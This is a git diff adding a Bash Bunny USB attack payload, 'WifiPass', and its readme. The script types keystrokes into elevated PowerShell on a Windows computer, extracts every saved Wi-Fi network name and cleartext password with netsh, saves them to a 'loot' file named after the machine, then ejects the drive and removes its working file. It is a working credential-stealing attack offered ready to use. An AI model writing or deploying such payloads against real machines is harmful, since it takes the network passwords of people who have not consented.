diff --git a/payloads/library/credentials/WifiPass/payload.txt b/payloads/library/credentials/WifiPass/payload.txt new file mode 100644 index 00000000..bf32b268 --- /dev/null +++ b/payloads/library/credentials/WifiPass/payload.txt @@ -0,0 +1,103 @@ +#!/bin/bash +# +# Title: WifiPass +# Author: TheRoninRunner +# Props: illwill +# Version: 1.0 +# Target: Windows +# +# Uses the power of netsh to get a list of all wifi networks and passwords +# stored on the computer. Windows 7 has some weird formatting issues with the +# loot file. +# +# Tested and working on Windows 7, 8.1, and 10. +# +# Goes through the netsh wlan show profiles and runs each with key=clear, +# saving any networks/keys that aren't open or WEP. For any network that +# users username and password to log in, you'll get the network name only. +# +# Blue --- Setup +# Yellow --- Using networks.txt to run through the networks +# White --- Clean up +# Green --- Done +# + +LED B + +#Creates the loot directory +mkdir -p /root/udisk/loot/WifiPass + +#Set up the Bash Bunny and get the networks and computer name +ATTACKMODE HID STORAGE +Q DELAY 2000 +Q GUI +Q DELAY 500 +Q STRING powershell +Q DELAY 2000 +Q CTRL-SHIFT ENTER +Q DELAY 2000 +Q LEFTARROW +Q DELAY 200 +Q ENTER +Q DELAY 1200 +Q STRING \$bb \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) +Q ENTER +Q DELAY 100 +Q STRING \$compname \= \(\$env\:computername\) +Q ENTER +Q DELAY 100 +Q STRING \(netsh wlan show profiles \| Out-File \$bb\\loot\\WifiPass\\networks.txt\) +Q ENTER +Q DELAY 100 + +#Types out commands to get the Wifi names and passwords, as well as store them +LED Y +Q STRING \(\$lines \= Get-Content \$bb\\loot\\WifiPass\\networks.txt\) +Q ENTER +Q STRING foreach \(\$line in \$lines\) \{ +Q ENTER +Q STRING \$fields \= \$line -split \'\: \' +Q ENTER +Q STRING \$names \= \$fields\[1\] +Q ENTER +Q STRING foreach \(\$name in \$names\)\{ +Q ENTER +Q STRING \$passwd = netsh wlan show profile \$name key\=clear \| findstr Key +Q ENTER +Q STRING \$pass \= \$passwd -split \'\: \' +Q ENTER +Q STRING if \(-Not \(\$pass -eq \1\)\) \{ +Q ENTER +Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \$name +Q ENTER +Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \$pass\[1\] +Q ENTER +Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \`n +Q ENTER +Q STRING } +Q ENTER +Q STRING } +Q ENTER +Q STRING } +Q ENTER +Q ENTER +Q DELAY 10000 + +# Eject the USB Safely and remove networks file +LED W +Q STRING \$Eject \= New-Object -comObject Shell.Application +Q ENTER +Q DELAY 100 +Q STRING \$Eject.NameSpace\(17\).ParseName\(\$bb\).InvokeVerb\(\"Eject\"\) +Q ENTER +Q DELAY 100 + +# GTFO +Q STRING EXIT +Q ENTER +#Sync Drive +sync +rm -f /root/udisk/loot/WifiPass/networks.txt + +#Trap is clean +LED G diff --git a/payloads/library/credentials/WifiPass/readme.md b/payloads/library/credentials/WifiPass/readme.md new file mode 100644 index 00000000..f3162d63 --- /dev/null +++ b/payloads/library/credentials/WifiPass/readme.md @@ -0,0 +1,23 @@ +# WifiPass +* Author: TheRoninRunner +* Version: Version 1.0 +* Props: illwill +* Target: Windows +* Working on Windows 7, 8.1, and 10 + +## About +A bit of a fork from WiFiCreds, this uses the same Powershell attack to get wifi networks and their passwords. + +WifiPass starts with getting the list of wireless networks saved on the device, storing those to a file. With a little bit of logic, it runs through the networks, only saving out networks that have a Key Content of anything besides 1 (1 being used in the case of WEP and open networks). *NOTE: this will give you network names of university/college networks that pass user accounts to log into them. They won't give you the password with this attack.* + +It stores all those in a loot file with the name of the computer. Eject, sync, Ghostbusters reference, then you're good to go. + +# No Configuration needed + +## Lights +| LED | Status | +|---|---| +| Blue | Creating loot dir and getting network names | +| Yellow | Looking through networks | +| White | Eject drive, sync, and remove network file | +| Green | Finished |